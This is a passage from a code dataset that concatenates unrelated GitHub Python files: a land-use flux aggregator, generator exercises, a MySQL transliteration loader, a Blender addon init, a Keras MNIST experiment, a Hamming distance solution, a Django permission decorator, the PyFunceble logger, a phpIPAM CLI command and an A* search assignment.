#Trick: to keep same time dimension\n for key in lu_dictionary: #agrregate total fluxes per each lu class\n classes=lu_dictionary[key]\n dts_lu=xr.where(LU.isin(classes),dts,np.nan) #mask only lu class\n if how=='sum':\n df_lu=dts_lu.sum(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #sum of all pixels in lu class\n elif how=='mean':\n df_lu=dts_lu.mean(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #mean of all pixels in lu class \n if len(df_lu.columns)>1: \n df_lu.columns=['{0}-{1}'.format(key,\n col) for col in df_lu.columns] #rename column with variable \n else:\n df_lu.columns=['{0}'.format(key) for col in df_lu.columns] #rename column \n data.append(df_lu) #append data list by lu class\n df=pd.concat(data, axis=1) #merge all results into 1 dataframe\n return df\n\n","repo_name":"trngbich/Hydroloop","sub_path":"WAsheets/calculate_flux.py","file_name":"calculate_flux.py","file_ext":"py","file_size_in_byte":9789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3061312109","text":"from random import randint\nfrom time import sleep\n\n\n# итератор\n# mylist1 = [1, 2, 3]\n# for i in mylist1:\n# print(i)\n\n# mylist2 = [x * x for x in range(3)]\n# for i in mylist2:\n # print(mylist2) #напечатает трижды [0, 1, 4]\n\n\n# генератор\n# mygenerator = (x*x for x in range(3))\n# for i in mygenerator:\n# print(i) # выведет 0 1 4\n\n\n#бесконечный генератор случайных чисел с условием 14.02\ndef create_generator(a, b, c) :\n while True:\n yield randint(a, b)\n a += c\n b += c\n sleep(1)\n\n# if __name__ == '__main__':\n#\n# for i in create_generator(0, 4, 2):\n# print(i)\n\n\n\n#№2\ndef create_generator():\n yield 1\n yield 2\n yield 3\n\n\n# if __name__ == '__main__':\n# # \n# gen = create_generator()\n# print(f'{next(gen)}!')\n# print(f'{next(gen)}@')\n\n\n# выведет: корова, кот, собака, медведь, кит\n# def my_animal_generator():\n# yield 'корова'\n# for animal in ['кот', 'собака', 'медведь']:\n# yield animal\n# yield 'кит'\n#\n# my_generator = my_animal_generator()\n# print(next(my_generator))\n# for animal in my_generator:\n # print(animal)","repo_name":"KarinaYatskevich/python","sub_path":"Lesson/Lessons/yield.py","file_name":"yield.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32586614844","text":"import json\nimport mysql.connector\nimport sensitive\nimport mdc2unicode\n\n# load transliterations from csv into dictionary dictTranslit\ntranslitcsv=r\"D:\\hieraProject\\P1_hieratable\\IntermediateData\\hierogtranslit.csv\"\nftranslit=open(translitcsv,encoding='utf-8-sig')\ntranslitrows=(line.split('\\t') for line in ftranslit)\ndictTranslit={}\nfor r in translitrows:\n sMultipleTranslits=r[1][0:-1]\n if sMultipleTranslits==\"-\":\n sMultipleTranslits=\"\"\n if sMultipleTranslits!=\"\":\n dictTranslit[r[0]]=[]\n for sTranslit in sMultipleTranslits.split(\",\"):\n dictTranslit[r[0]].append({'ascii':mdc2unicode.unicode2mdc(sTranslit),'unicode':sTranslit})\nftranslit.close()\n\n\n#connect to database\nhieradb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=sensitive.mysqlPassword,\n database=\"hiera\"\n)\n\nfor k,v in dictTranslit.items():\n jsonDump=json.dumps(dictTranslit[k])\n print(jsonDump)\n c = hieradb.cursor()\n sql = \"UPDATE signsandgroups SET transliterations = %s WHERE mdc = %s\"\n val = (jsonDump,k)\n c.execute(sql, val)\n hieradb.commit()\n","repo_name":"PhilHen/nkhp","sub_path":"code/storeTransliterationsInSignsAndGroupsFromCSV.py","file_name":"storeTransliterationsInSignsAndGroupsFromCSV.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20092463299","text":"import bpy\n\nclass rmKitPannel_parent( bpy.types.Panel ):\n\tbl_idname = \"VIEW3D_PT_RMKIT_PARENT\"\n\tbl_label = \"rmKit\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"rmKit\"\n\n\tdef draw( self, context ):\n\t\tlayout = self.layout\n\nclass rmKitPannel_parent_uv( bpy.types.Panel ):\n\tbl_idname = \"UV_PT_RMKIT_PARENT\"\n\tbl_label = \"rmKit\"\n\tbl_space_type = \"IMAGE_EDITOR\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"rmKit\"\n\n\tdef draw( self, context ):\n\t\tlayout = self.layout\n\nfrom . import polypatch\nfrom . import reduce\nfrom . import context_bevel\nfrom . import loopring\nfrom . import move_to_furthest\nfrom . import knifescreen\nfrom . import connect_edges\nfrom . import arcadjust\nfrom . import targetweld\nfrom . import createtube\nfrom . import vnormals\nfrom . import copypaste\nfrom . import cursor\nfrom . import workplane\nfrom . import screenreflect\nfrom . import selectionmode\nfrom . import radial_align\nfrom . import edgeweight\nfrom . import grabapplymat\nfrom . import extend\nfrom . import quickmaterial\nfrom . import thicken\nfrom . import stitch\nfrom . import panel\nfrom . import gridify\nfrom . import relativeislands\nfrom . import uvtransform\nfrom . import unrotate\nfrom . import rectangularize\nfrom . import hotspot\nfrom . import uvboundstransform\nfrom . import dimensions\nfrom . import uvgrowshrink\nfrom . import preferences\nfrom . import quickboolean\nfrom . import naming\nfrom . import quicksculptnav\n\ndef register():\n\tbpy.utils.register_class( rmKitPannel_parent )\n\tbpy.utils.register_class( rmKitPannel_parent_uv )\t\n\tpolypatch.register()\n\treduce.register()\n\tcontext_bevel.register()\n\tloopring.register()\n\tmove_to_furthest.register()\n\tknifescreen.register()\t\n\tconnect_edges.register()\n\tarcadjust.register()\n\ttargetweld.register()\n\tcreatetube.register()\n\tcopypaste.register()\n\tcursor.register()\n\tworkplane.register()\n\tscreenreflect.register()\n\tselectionmode.register()\n\tradial_align.register()\n\tedgeweight.register()\n\tgrabapplymat.register()\n\textend.register()\n\tquickmaterial.register()\n\tthicken.register()\n\tpanel.register()\n\tvnormals.register()\n\tstitch.register()\n\tgridify.register()\n\trelativeislands.register()\n\tunrotate.register()\n\tuvtransform.register()\n\trectangularize.register()\n\thotspot.register()\n\tuvboundstransform.register()\n\tdimensions.register()\n\tquickboolean.register()\n\tuvgrowshrink.register()\n\tquicksculptnav.register()\n\tpreferences.register()\n\tnaming.register()\n\ndef unregister():\n\tbpy.utils.unregister_class( rmKitPannel_parent )\n\tbpy.utils.unregister_class( rmKitPannel_parent_uv )\t\n\tpolypatch.unregister()\n\treduce.unregister()\n\tcontext_bevel.unregister()\n\tloopring.unregister()\n\tmove_to_furthest.unregister()\n\tknifescreen.unregister()\n\tconnect_edges.unregister()\n\tarcadjust.unregister()\n\ttargetweld.unregister()\n\tcreatetube.unregister()\t\n\tcopypaste.unregister()\n\tcursor.unregister()\n\tworkplane.unregister()\n\tscreenreflect.unregister()\n\tselectionmode.unregister()\n\tradial_align.unregister()\n\tedgeweight.unregister()\n\tgrabapplymat.unregister()\n\textend.unregister()\n\tquickmaterial.unregister()\t\n\tthicken.unregister()\n\tpanel.unregister()\n\tvnormals.unregister()\n\tstitch.unregister()\n\tgridify.unregister()\n\trelativeislands.unregister()\n\tunrotate.unregister()\n\tuvtransform.unregister()\n\trectangularize.unregister()\n\thotspot.unregister()\n\tuvboundstransform.unregister()\n\tdimensions.unregister()\n\tquickboolean.unregister()\n\tuvgrowshrink.unregister()\n\tquicksculptnav.unregister()\n\tpreferences.unregister()\n\tnaming.unregister()","repo_name":"roosterMAP/rmKit","sub_path":"addon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"22715824009","text":"# TESTING NORMALAZATION WITH DROPOUT's IMPORTANCE\n\nimport keras\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\n\n# to add convolution relayer\nfrom keras.layers.convolutional import Conv2D\n# to add pooling layers\nfrom keras.layers.convolutional import MaxPooling2D\n# to flatten layers and to also add dropout and dense\nfrom keras.layers import Flatten, Dropout, Dense\n\n# to plot things\nimport matplotlib.pyplot as plt\n\n# to import minst data \nfrom keras.datasets import mnist\n\n# Reseau convolution simple \ndef cnn_keras_model():\n\tmodel = Sequential()\n\t# 32, 3x3 convolution filters\n\tmodel.add(Conv2D(32, kernel_size = (3, 3), activation = 'relu', input_shape = input_shape))\n\t# 64, 3x3 convolution filters\n\tmodel.add(Conv2D(64, kernel_size = (3, 3), activation = 'relu'))\n\tmodel.add(MaxPooling2D(pool_size = (2,3)))\n\n\t# WE TAKE THE 25% DROPOUT OFF\n\n\t# convert data from 2D to 1D\n\tmodel.add(Flatten()) \n\t# dense layer of 128 neurons\n\tmodel.add(Dense(128, activation = 'relu'))\n\n\t# WE TAKE THE 50% DROPOUT OFF\n\n\tmodel.add(Dense(num_classes, activation = 'softmax'))\n\n\t# Adam optimizer\n\tmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n\n# fixing image dimensions\nimg_rows = 28\nimg_cols = 28\n\n# reading and preparing the data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n\tX_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n\tX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n\tinput_shape = (1,img_rows, img_cols)\nelse :\n\tX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n\tX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n\tinput_shape = (img_rows, img_cols, 1)\n\n# normalizing data\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# encode outputs\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\nnum_classes = y_test.shape[1]\nprint(\"num_calasses = \", num_classes)\n\nmodel = cnn_keras_model()\n\n# training on 12 époques\nhist = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=12, verbose=2)\n\n# Evaluating the module\nscores = model.evaluate(X_test, y_test, verbose=0)\n\n# check precision\nprint('---->Accuracy: {}% \\n---->Error: {}'.format(scores[1], 1 - scores[1]))\n\n# PLOTTING TRAINING EVOLUTION\nxvals = range(12)\t\t# 12 data points (because we do 12 epoques)\nplt.clf()\t\t\t\t# Clear figure\n# plot boreth training and validation accuracy on the same figure\nplt.plot(xvals, hist.history[\"acc\"], label = \"Traning accuracy\")\nplt.plot(xvals, hist.history[\"val_acc\"], label = \"Validation accuracy\")\nplt.legend() # display legend\nplt.show() # show the figure\n\n# output\n#\t---->Accuracy: 0.9876%\t\t& \t\t---->Error: 0.012399999999999967\n# On remaruqe une grande difference par rapport a la premier partie ou on fesait la normalisation\n\n","repo_name":"BACCARIS/deep_learning_simple_games","sub_path":"TP3_Q1_2.py","file_name":"TP3_Q1_2.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22455682096","text":"'''\n@Author: your name\n@Date: 2020-02-28 11:43:54\n@LastEditTime: 2020-02-28 11:50:57\n@LastEditors: Please set LastEditors\n@Description: In User Settings Edit\n@FilePath: \\vscode_code\\GitHub项目\\interesting_python\\盲僧抓包\\分析.py\n'''\nimport pandas as pd \n\ndata = pd.read_csv(r'E:\\vscode_code\\GitHub项目\\interesting_python\\盲僧抓包\\com_detailed.csv')\ndata = data[data['com_type'].isin(['有限责任公司(自然人投资或控股)',\n '有限责任公司' '有限责任公司(法人独资)'])].groupby(['reg_name']).size().reset_index()\nprint(data)\n","repo_name":"Summer-Friend/data_analyze","sub_path":"GitHub项目/interesting_python/盲僧抓包/分析.py","file_name":"分析.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"35565803364","text":"\n\"\"\"\nCOMP3620-6320 Artificial Intelligence 2017 - Planning Assignment Q2\n\nEnter your details below:\n\nName: Zi JIN\nStudent Code:\tu5541673\nemail: u5541673@anu.edu.au\n\n\nImplements the A* (a-star) search algorithm for planning.\n\nMethod to be implemented is a_star.\n\nWe import some basic data-structure that can be useful to tackle the problem. \nHave a look at *heapq* that is an efficient implementation of a priority queue using a heap data-structure\nHave a look at searchspace that gives you an implementation of a searchnode. In particular look at make_root_node and make_child_node\n\"\"\"\n\nimport heapq # heapq.xxxx\nimport logging\n\nfrom search import searchspace # make_root_node # make_child_node # extract_solution\nfrom planning_task import Task\nfrom heuristics import BlindHeuristic\n\n\n\ndef a_star(task, heuristic=BlindHeuristic):\n\t\"\"\"\n\tSearches for a plan in the given task using A* search.\n\n\t@param task The task to be solved\n\t@param heuristic A heuristic callable which computes the estimated steps\n\t\t\t\t\t from a search node to reach the goal.\n\t\"\"\"\n\t\n\theap = []\n\troot_node = searchspace.make_root_node(task.initial_state) # def __init__(self, state, parent, action, g):\n\texplored = {}\n\t\n\t\n\texplored [root_node.state] = root_node.g\n\n\tcounter = 1 \n\theapq.heappush(heap,( root_node.g+ heuristic(root_node) ,counter , root_node ))\n\tnode_expansion = 0 \n\t\n\twhile (True):\n\t\tnode = heapq.heappop(heap)[2]\n\t\tnode_expansion = node_expansion + 1\n\t\tif task.goal_reached(node.state):\n\t\t\tprint(\"------------------\")\n\t\t\tprint(\"node expasion:\")\n\t\t\tprint(node_expansion)\n\t\t\tprint(\"------------------\")\n\t\t\treturn node.extract_solution()\n\n\t\tfor successor in task.get_successor_states(node.state): # pair successor(1) or [1]\n\t\t\tsucc_state = successor[1]\n\t\t\tsucc_action = successor[0]\n\t\t\t\n\n\t\t\tnew_node = searchspace.make_child_node(node,succ_action,succ_state) #make_child_node(parent, action, state):\n\n\t\t\tif (succ_state in explored and explored[succ_state] > new_node.g) or (succ_state not in explored) : # reopen! \n\t\t\t\tcounter = counter + 1\n\t\t\t\theapq.heappush(heap,( new_node.g+ heuristic(new_node) , counter ,new_node ))\n\t\t\t\texplored [succ_state] = new_node.g\n\t\t\t\n\t\t\t\n\t\t\t'''\n\t\t\tskip = False # if the state is already in the heapq, then update it rather than push it \n\t\t\tfor elem in heap : \n\t\t\t\tif elem[2].state == succ_state:\n\t\t\t\t\ta_counter = a_counter +1\n\t\t\t\t\tskip = True \n\t\t\t\t\telem[2].parent = new_node.parent\n\t\t\t\t\telem[2].action = succ_action\n\t\t\t\t\telem[2].g = new_node.g\n\t\t\t'''\n\t\t\t\n\t\t\t#if not skip:\n\t\t\t'''\n\t\t\tif succ_state not in explored:\n\t\t\t\tcounter = counter + 1\n\t\t\t\theapq.heappush(heap,( new_node.g+ heuristic(new_node) , counter ,new_node ))\n\t\t\t\texplored [succ_state] = new_node.g\n\t\t\t'''\n\n\t\t\t\n\t'''\n\tdef find(heap, f):\n\t\t\"\"\" Returns some item n from the queue such that f(n) == True and None \n\t\t\tif there is no such item. \n\t\t\t(PriorityQueue, (object) -> object/None) -> object\n\t\t\"\"\"\n\t\tfor elem in heap:\n\t\t\tif f(elem[2]):\n\t\t\t\treturn elem[2]\n\t\treturn None\n\t\t\n\tdef change_priority(heap, item, priority,counter):\n\t\t\"\"\" Change the priority of the given item to the specified value. If\n\t\t\tthe item is not in the queue, a ValueError is raised.\n\t\t\t(PriorityQueue, object, int) -> None\n\t\t\"\"\"\n\t\tfor eid, elem in enumerate(heap):\n\t\t\tif elem[2] == item:\n\t\t\t\theap[eid] = (priority, count, item)\n\t\t\t\tcount += 1\n\t\t\t\theapq.heapify(heap)\n\t\t\t\treturn\n\t\traise ValueError(\"Error: \" + str(item) + \" is not in the PriorityQueue.\")\n\t'''\n\t\t\t\n\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t","repo_name":"Gin93/ARTIFICIAL-INTELLIGENCE","sub_path":"COMP3620-6230-2017-Assignment-3-Automated-Planning-master-0dc31f6148a5a8ee26687fdeeacc4ae11f17e6fc/code/search/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11003972971","text":"class Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n The Hamming distance between two integers is the number of positions \n at which the corresponding bits are different.\n \n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n # Convert ints to 32 bit string representation\n bin_x = bin(x)[2::].zfill(32)\n bin_y = bin(y)[2::].zfill(32)\n\n print(bin_x)\n print(bin_y)\n\n count = 0\n\n for i in range(32):\n if bin_x[i] != bin_y[i]:\n count += 1\n\n return count\n\n def hammingDistance2(self, x, y):\n return bin(x ^ y).count('1')\n\n\n\ns = Solution()\ni1 = 4\ni2 = 1\n\nprint(s.hammingDistance(i1, i2))\nprint(s.hammingDistance2(i1, i2))","repo_name":"terrykwon/practice_problems","sub_path":"leetcode/461_hamming_distance.py","file_name":"461_hamming_distance.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23899214108","text":"from typing import Optional, Any, Callable\nfrom core.settings.base import PLUGINS_DIR\nfrom .exceptions import OwnerIDError, KeyChainIDError, ActionError, AccessDeniedError\nfrom .models import User, KeyChain, Action, Role, Permit\n\n\nclass BaseProtectedResource:\n\n __slots__ = 'user', 'owner_id', 'keychain_id'\n\n plugin = None # Some magic requested!\n\n def __init__(\n self,\n user: Optional[User] = None,\n owner_id: Optional[Any] = None,\n keychain_id: Optional[Any] = None):\n\n self.user = user\n self.owner_id = owner_id\n self.keychain_id = keychain_id\n\n @staticmethod\n def get_plugin_name(view_filepath: str):\n plugin = view_filepath[view_filepath.find(PLUGINS_DIR) + len(PLUGINS_DIR) + 1:]\n return plugin[:plugin.find('/')]\n\n\ndef check_authorization(action: str, when_denied: Optional[Any] = None, on_error: Optional[Callable] = None):\n def deco(func):\n def wrapper(obj: BaseProtectedResource, *args, **kwargs):\n try:\n owner = User.objects.get(id=obj.owner_id) if obj.owner_id else None\n except User.DoesNotExist:\n if on_error:\n return on_error(f\"Owner with ID {obj.owner_id} unknown\")\n raise OwnerIDError(\"Owner unknown\", obj.owner_id)\n\n try:\n act = Action.objects.get(name=action, plugin__name=obj.plugin)\n except Action.DoesNotExist:\n if on_error:\n return on_error(f\"Action with name {action} unknown\")\n raise ActionError(\"Action unknown\", action)\n\n is_owner = obj.user == owner if owner else None\n\n if obj.keychain_id:\n try:\n permits = KeyChain.objects.get(id=obj.keychain_id).permissions\n except KeyChain.DoesNotExist:\n if on_error:\n return on_error(f\"Keychain with ID {obj.owner_id} unknown\")\n raise KeyChainIDError(\"keychain unknown\", obj.keychain_id)\n else:\n permits = Permit.objects.filter(\n actions=act,\n roles__in=Role.objects.filter(groups__in=obj.user.groups.all())\n )\n\n permissions = (\n {\n permit.allows(\n obj.user, act, by_owner=is_owner) for permit in permits if permit.affects_on(obj.user)\n }\n )\n\n if permissions and permissions != {None}:\n if False not in permissions:\n return func(obj, *args, **kwargs)\n else:\n if act.default_rule is True:\n return func(obj, *args, **kwargs)\n\n if when_denied is not None:\n return when_denied\n\n raise AccessDeniedError('Access denied', obj.user.pk)\n\n return wrapper\n return deco\n","repo_name":"ISGNeuroTeam/complex_rest","sub_path":"complex_rest/rest_auth/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10641554569","text":"import logging\nfrom logging.handlers import RotatingFileHandler\nfrom os import sep as directory_separator\nfrom traceback import format_exc, format_stack\n\nimport PyFunceble\n\n\n# pylint: disable=too-many-instance-attributes\nclass Logger: # pragma: no cover\n \"\"\"\n Provides our logging logic.\n \"\"\"\n\n format_to_apply = \"[%(asctime)s::%(levelname)s::%(origin_path)s:%(origin_line)s@%(origin_func)s](PID%(process)s:%(processName)s): %(message)s\" # pylint: disable=line-too-long\n \"\"\"\n The format to apply.\n \"\"\"\n\n root_logger_format = (\n \"[%(asctime)s::%(levelname)s](PID%(process)s:%(processName)s): %(message)s\"\n )\n \"\"\"\n The format to parse to the root logger (if used).\n \"\"\"\n\n def __init__(self, debug=False, on_screen=False, output_directory=None):\n self.on_screen = (\n on_screen\n or PyFunceble.helpers.EnvironmentVariable(\n \"DEBUG_PYFUNCEBLE_ON_SCREEN\"\n ).exists()\n )\n\n self.authorized = self.authorization(debug)\n\n self.init(output_directory)\n\n def authorization(self, debug):\n \"\"\"\n Provides the operation authorization.\n \"\"\"\n\n return (\n debug\n or self.on_screen\n or PyFunceble.helpers.EnvironmentVariable(\"DEBUG_PYFUNCEBLE\").exists()\n or PyFunceble.helpers.EnvironmentVariable(\n \"DEBUG_PYFUNCEBLE_ON_SCREEN\"\n ).exists()\n or PyFunceble.CONFIGURATION.debug\n )\n\n def init(self, output_directory=None):\n \"\"\"\n Initiates the logger.\n \"\"\"\n\n if self.authorized:\n self.formatter = logging.Formatter(self.format_to_apply)\n\n self.__set_output_directory(output_directory)\n self.__init_loggers()\n\n def __set_output_directory(self, output_directory):\n \"\"\"\n Shares the given output directory.\n\n .. note::\n If the given output directory does not exists, we create it.\n\n :param string output_directory: The output directory.\n \"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n if self.authorized and not self.on_screen:\n if output_directory:\n self.output_directory = output_directory\n else:\n self.output_directory = (\n PyFunceble.OUTPUT_DIRECTORY\n + PyFunceble.OUTPUTS.parent_directory\n + PyFunceble.OUTPUTS.logs.directories.parent\n )\n\n PyFunceble.helpers.Directory(self.output_directory).create()\n\n def __init_loggers(self):\n \"\"\"\n Initiates all loggers.\n \"\"\"\n\n # pylint: disable=attribute-defined-outside-init\n\n if self.authorized and not hasattr(self, \"info_logger\"):\n self.info_logger = logging.getLogger(\"PyFunceble.info\")\n self.info_logger.setLevel(logging.INFO)\n\n self.debug_logger = logging.getLogger(\"PyFunceble.debug\")\n self.debug_logger.setLevel(logging.DEBUG)\n\n self.warning_logger = logging.getLogger(\"PyFunceble.warning\")\n self.warning_logger.setLevel(logging.WARNING)\n\n self.error_logger = logging.getLogger(\"PyFunceble.error\")\n self.error_logger.setLevel(logging.ERROR)\n\n self.fatal_logger = logging.getLogger(\"PyFunceble.fatal\")\n self.fatal_logger.setLevel(logging.FATAL)\n\n self.critical_logger = logging.getLogger(\"PyFunceble.critical\")\n self.critical_logger.setLevel(logging.CRITICAL)\n\n for logger_name in self.__dict__:\n if not logger_name.endswith(\"_logger\"):\n continue\n\n handler_type = logger_name.split(\"_\")[0].lower()\n\n current_logger = getattr(self, logger_name)\n\n if not current_logger.hasHandlers():\n current_logger.addHandler(self.__get_handler(handler_type))\n\n @classmethod\n def get_origin_info(cls):\n \"\"\"\n Returns the information about where the logger was triggered.\n\n :return:\n A tuple, which is composed of the following.\n\n (trigger file path, trigger line, trigger function/method name)\n\n :rtype: tuple\n \"\"\"\n\n stackback = [y for x in [x.split(\"\\n\") for x in format_stack()] for y in x if y]\n interest = stackback[-6].split(\",\")\n\n complete_file = interest[0].strip()[6:-1].split(directory_separator)\n\n try:\n if complete_file[-2] != PyFunceble.NAME:\n file = \"/\".join(complete_file)\n else:\n file = \"/\".join(complete_file[-2:])\n except IndexError:\n file = \"/\".join(complete_file)\n\n line = interest[1].strip().split()[-1].strip()\n func_name = interest[2].strip()[3:]\n\n return file, line, func_name\n\n def __get_handler(self, handler_type):\n \"\"\"\n Provides a handler for of the given type.\n \"\"\"\n\n handler_type = handler_type.upper()\n\n if hasattr(logging, handler_type):\n if self.on_screen:\n handler = logging.StreamHandler()\n else:\n handler = RotatingFileHandler(\n self.output_directory + f\"{handler_type.lower()}.log\",\n maxBytes=10_000_000,\n backupCount=10,\n )\n\n handler.setLevel(getattr(logging, handler_type))\n handler.setFormatter(self.formatter)\n\n return handler\n\n return None\n\n def info(self, message):\n \"\"\"\n Logs the info message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.info_logger.info(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def debug(self, message):\n \"\"\"\n Logs the debug message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.debug_logger.debug(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def warning(self, message):\n \"\"\"\n Logs the warning message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.warning_logger.warning(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def error(self, message):\n \"\"\"\n Logs the error message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.error_logger.error(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def fatal(self, message):\n \"\"\"\n Logs the fatal message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.fatal_logger.fatal(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def critical(self, message):\n \"\"\"\n Logs the critical message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.critical_logger.critical(\n message,\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n\n def exception(self):\n \"\"\"\n Logs the exception message.\n \"\"\"\n\n if self.authorized:\n file, line, func_name = self.get_origin_info()\n self.error_logger.error(\n f\"\\n{format_exc()}\",\n extra={\n \"origin_path\": file,\n \"origin_line\": line,\n \"origin_func\": func_name,\n },\n )\n","repo_name":"cargo12/PyFunceble","sub_path":"PyFunceble/engine/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"1002568946","text":"# -*- coding: utf-8 -*-\nimport click\nimport netaddr\nimport sys\nfrom ipamcli.cli import pass_context\nimport ipamcli.libs.phpipam.client as phpipam\nfrom ipamcli.libs.phpipam import exception\n\n\n@click.command('add', short_help='add new entry to phpIPAM')\n@click.option('--first-empty', is_flag=True, help='search first empty IP address')\n@click.option('--last-empty', is_flag=True, help='search last empty IP address')\n@click.option('--network', help='network address for first-empty search')\n@click.option('--vlan-id', metavar='', help='vlan id for first-empty search')\n@click.option('--vlan-name', help='vlan name for first-empty search')\n@click.option('--ip', help='ip address for new entry')\n@click.option('--mac', help='mac address for new entry')\n@click.option('--hostname', default='fqdn.local', show_default=True, help='fqdn for new entry')\n@click.option('--description', default=\"\", help='description for new entry')\n@pass_context\ndef cli(ctx, first_empty, last_empty, network, vlan_id, vlan_name, ip, mac, hostname, description):\n \"\"\"Add new entry to phpIPAM.\"\"\"\n if first_empty or last_empty:\n if not network and not vlan_id and not vlan_name:\n ctx.logerr('At least one of the --network / --vlan-id / --vlan-name option must be set when use --first-empty / --last-empty option .')\n sys.exit(1)\n\n if vlan_id:\n if vlan_id not in ctx.vlan_list:\n ctx.logerr('No such vlan id in list.')\n sys.exit(1)\n\n else:\n network = ctx.vlan_list[vlan_id]['prefix']\n\n elif vlan_name:\n for item in ctx.vlan_list:\n if ctx.vlan_list[item]['name'] == vlan_name:\n network = ctx.vlan_list[item]['prefix']\n\n if not network:\n ctx.logerr('No such vlan name in list.')\n sys.exit(1)\n\n try:\n network = netaddr.IPNetwork(network)\n\n except netaddr.core.AddrFormatError:\n ctx.logerr('Network address %s is invalid.', network)\n sys.exit(1)\n\n subnetId = phpipam.get_subnet_id(ctx, network)\n\n if first_empty:\n ip = phpipam.get_first_empty(ctx, network)\n elif last_empty:\n ip = phpipam.get_last_empty(ctx, network)\n\n if ip is None:\n ctx.logerr('No free IP found in subnet.')\n sys.exit(1)\n\n elif ip:\n if not phpipam.checkIP(ip):\n ctx.logerr('IP address %s is invalid.', ip)\n sys.exit(1)\n else:\n subnet = phpipam.get_subnet_by_ip(ctx, ip)\n subnetId = subnet['id']\n network = subnet['subnet']\n try:\n network = netaddr.IPNetwork(network)\n\n except netaddr.core.AddrFormatError:\n ctx.logerr('Network address %s is invalid.', network)\n sys.exit(1)\n\n else:\n ctx.logerr('At least one of the add option must be set.')\n sys.exit(1)\n\n if mac:\n if not phpipam.checkMAC(mac):\n ctx.logerr('MAC address %s is invalid.', mac)\n return\n else:\n mac = \"\"\n\n payload = {\"subnetId\": int(subnetId), \"ip\": str(ip), \"mac\": mac, \"hostname\": hostname, \"description\": description}\n try:\n result = phpipam.add_address(ctx, payload)\n\n except exception.ipamCLIIPExists:\n ctx.logerr('Oops. IP address already exists.')\n sys.exit(1)\n\n except Exception:\n ctx.logerr('Oops. HTTP API error occured.')\n sys.exit(1)\n\n if result is not None:\n ctx.log('The entry for ip %s/%s (%s) has been successfully created. The entry ID: %s.',\n ip,\n phpipam.get_network_prefix_by_subnet(network),\n phpipam.get_network_mask_by_subnet(network),\n result)\n\n else:\n ctx.logerr('Error creating entry.')\n sys.exit(1)\n","repo_name":"verdel/ipamcli","sub_path":"ipamcli/commands/cmd_add.py","file_name":"cmd_add.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29059013477","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis module implements builders for database objects, which are useful\nfor testing.\n\nBuilders can lazily build database objects. They store all data required to\ncreate an object, but only require a session to actually create (\"build\")\nit, so they can be safely modified, serialized, created in setUp 